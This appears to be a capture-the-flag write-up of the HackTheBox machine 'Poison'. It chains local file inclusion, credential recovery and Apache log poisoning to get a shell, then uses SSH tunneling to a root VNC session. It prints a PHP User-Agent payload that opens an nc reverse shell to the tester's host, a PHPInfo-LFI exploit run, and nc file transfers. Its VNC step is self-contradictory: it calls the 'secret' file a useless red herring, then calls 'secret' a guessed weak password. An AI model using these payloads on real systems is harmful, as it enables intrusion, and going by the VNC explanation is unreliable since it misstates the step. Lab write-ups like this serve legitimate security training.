Post

HackTheBox Poison

Writeup for HackTheBox Poison

HackTheBox Poison

Machine Synopsis

Poison is a fairly easy machine which focuses mainly on log poisoning and port forwarding/tunneling. The machine is running FreeBSD which presents a few challenges for novice users as many common binaries from other distros are not available. (Source)

Key exploitation techniques:

  • Local File Inclusion (LFI) for arbitrary file read
  • Multi-layered Base64 decoding for password recovery
  • Log poisoning for RCE
  • PHPInfo + LFI for RCE
  • SSH for initial user access
  • Process enumeration for VNC service discovery
  • SSH local port forwarding for VNC access
  • Weak VNC password for root access

Enumeration

1
2
3
4
5
6
7
8
9
10
11
$ nmap -sC -sV -A -p- 10.10.10.84

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
|   256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_  256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32

The scan identified SSH and Apache HTTPD with PHP on port 80.

website

Browsing the website showed a listfiles.php input that revealed other files in the directory.

1
2
3
4
5
6
7
8
9
10
11
12
13
# Output from http://10.10.10.84/browse.php?file=listfiles.php
Array
(
    [0] => .
    [1] => ..
    [2] => browse.php
    [3] => index.php
    [4] => info.php
    [5] => ini.php
    [6] => listfiles.php
    [7] => phpinfo.php
    [8] => pwdbackup.txt
)

The URL http://10.10.10.84/browse.php?file=listfiles.php strongly suggested an LFI vulnerability.

Exploitation

Method 1 - LFI & Credential Disclosure (charix)

The LFI vulnerability was used to read pwdbackup.txt.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# Request: http://10.10.10.84/browse.php?file=pwdbackup.txt
# Response content:
Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU
bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS
bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW
M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs
WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy
eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G
WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw
MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa
T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k
WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk
WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0
NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT
Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz
WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW
VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO
Ukd4RVdub3dPVU5uUFQwSwo=

The content appeared to be multiple layers of Base64 encoding. Decoding it repeatedly using CyberChef eventually revealed the plaintext: Charix!2#4%6&8(0.

The LFI was then used to read /etc/passwd to find a corresponding username.

1
2
3
4
5
6
# Request: http://10.10.10.84/browse.php?file=../../../../../etc/passwd
# Response snippet:
# $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $ #
root:*:0:0:Charlie &:/root:/bin/csh
...
charix:*:1001:1001:charix:/home/charix:/bin/csh

The username charix was found. SSH access was gained using charix:Charix!2#4%6&8(0.

1
2
3
4
5
6
7
8
$ ssh charix@10.10.10.84
The authenticity of host '10.10.10.84 (10.10.10.84)' can't be established.
...
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.84' (ED25519) to the list of known hosts.
(charix@10.10.10.84) Password for charix@Poison:Charix!2#4%6&8(0
...
charix@Poison:~ %

Method 2 - Log Poisoning for RCE (www)

The phpinfo.php page indicated the system was running FreeBSD. Research suggested Apache logs on FreeBSD are typically at /var/log/httpd-access.log. The LFI was used to read this log.

1
2
3
4
5
6
7
8
9
# Request: GET /browse.php?file=/var/log/httpd-access.log HTTP/1.1
# Host: 10.10.10.84
# User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
# ...

# Response snippet:
...
10.10.14.2 - - [18/Jul/2022:03:31:39 +0200] "GET /browse.php?file=listfiles.php HTTP/1.1" 200 192 "http://10.10.10.84/" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
...

The User-Agent string was logged, which is controllable. A PHP reverse shell payload was injected into the User-Agent.

1
2
3
4
5
6
7
8
9
10
# Request: GET /browse.php?file=/var/log/httpd-access.log HTTP/1.1
# Host: 10.10.10.84
# User-Agent: <?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 1234 >/tmp/f') ?>
# ...

# Response snippet:
HTTP/1.1 200 OK
Date: Mon, 18 Jul 2022 02:37:41 GMT
Server: Apache/2.4.29 (FreeBSD) PHP/5.6.32
...

A netcat listener was set up. The log file was then accessed again via LFI, triggering the PHP code stored in the User-Agent.

1
2
3
4
5
6
7
8
9
10
11
12
# Request: GET /browse.php?file=/var/log/httpd-access.log HTTP/1.1
# Host: 10.10.10.84
# User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
# ...

# Netcat listener
$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.84] 16068
sh: can't access tty; job control turned off
$ whoami
www

This granted a reverse shell as www.

Method 3 - PHPInfo to LFI

The presence of both LFI and phpinfo.php suggested the PHPInfo LFI exploit. The phpinfolfi.py script from PayloadsAllTheThings was used. It required modification of parameters:

  • PAYLOAD to a PHP reverse shell (e.g., from /usr/share/laudanum/php/php-reverse-shell.php).
  • LFIREQ to GET /browse.php?file=%s HTTP/1.1\r.
  • All occurrences of [tmp_name] => to [tmp_name] =&gt.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
$ python phpinfolfi.py 10.10.10.84
Don't forget to modify the LFI URL
LFI With PHPInfo()
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Getting initial offset... found [tmp_name] at 112940
Spawning worker pool (10)...
  10 /  1000
Got it! Shell created in /tmp/g

Woot!   \m/
Shuttin' down...

# Netcat listener
$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.84] 47661
FreeBSD Poison 11.1-RELEASE FreeBSD 11.1-RELEASE #0 r321309: Fri Jul 21 02:08:28 UTC 2017    root@releng2.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC  amd64
 5:32AM  up 16 mins, 1 users, load averages: 0.28, 0.35, 0.27
USER        TTY      FROM                                            LOGIN@  IDLE WHAT
charix      pts/1    10.10.14.2                                      5:21AM   11 -cs
uid=80(www) gid=80(www) groups=80(www)
sh: can't access tty; job control turned off
$ whoami
www

This also granted a reverse shell as www.

Privilege Escalation

Enumeration of charix’s home directory revealed secret.zip. This file was transferred, but its contents were unreadable after decryption, indicating it was a red herring.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
charix@Poison:~ % ls
secret.zip      user.txt

# On attacker, set up listener
$ nc -nlvp 1111 > secret.zip

# On target, send file
charix@Poison:~ % nc -w 3 10.10.14.2 1111 < secret.zip

# On attacker, unzip (using charix's password)
$ unzip secret.zip
Archive:  secret.zip
[secret.zip] secret password: Charix!2#4%6&8(0
  extracting: secret

$ file secret
secret: Non-ISO extended-ASCII text, with no line terminators
$ cat secret
[|z!

Process enumeration with ps -aux revealed a VNC process running as root.

1
2
3
4
5
charix@Poison:~ % ps -aux
USER   PID %CPU %MEM    VSZ   RSS TT  STAT STARTED     TIME COMMAND
...
root   529   0.0  0.9  23620  8872 v0- I    03:28    0:00.03 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/clas
...

Further inspection with ps -auxww | grep vnc showed the VNC server running on port 5901 and authenticated via /root/.vnc/passwd.

1
2
3
charix@Poison:~ % ps -auxww | grep vnc
root   529   0.0  0.9  23620  8872 v0- I    03:28    0:00.03 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5901 -localhost -nolisten tcp :1
charix 873   0.0  0.0    412   328  1  R+   04:54    0:00.00 grep vnc

netstat -an confirmed 127.0.0.1:5901 was listening.

1
2
3
4
5
6
charix@Poison:~ % netstat -an
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         (state)
...
tcp4        0      0 127.0.0.1.5901           *.* LISTEN
...

Since the VNC service was listening locally, SSH local port forwarding was used to access it from the attacking machine.

1
2
3
4
5
6
7
8
9
10
# On attacker, set up SSH tunnel
$ ssh -L 9999:127.0.0.1:5901 charix@10.10.10.84
(charix@10.10.10.84) Password for charix@Poison:Charix!2#4%6&8(0
...

# On attacker, verify tunnel
$ netstat -an | grep LISTEN
tcp         0      0 127.0.0.1:9999          0.0.0.0:* LISTEN
tcp6        0      0 ::1:9999                :::* LISTEN
...

vncviewer was then used to connect to the forwarded port. The VNC password was secret (a common weak password or hint in HTB machines, often found through brute-forcing or implied context).

1
2
3
4
5
6
7
$ vncviewer 127.0.0.1:9999 -passwd secret
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
Performing standard VNC authentication
Authentication successful
Desktop name "root's X desktop (Poison:1)"
...

vncviewer

This granted a root desktop session. The user.txt and root.txt flags were retrieved.

1
2
3
4
5
6
7
8
root@Poison:~ # ls /home
charix

root@Poison:~ # cat /home/charix/user.txt
eaacdfb2d141b72a589233063604209c

root@Poison:~ # cat /root/root.txt
716d04b188419cf2bb99d891272361f5
This post is licensed under CC BY 4.0 by the author.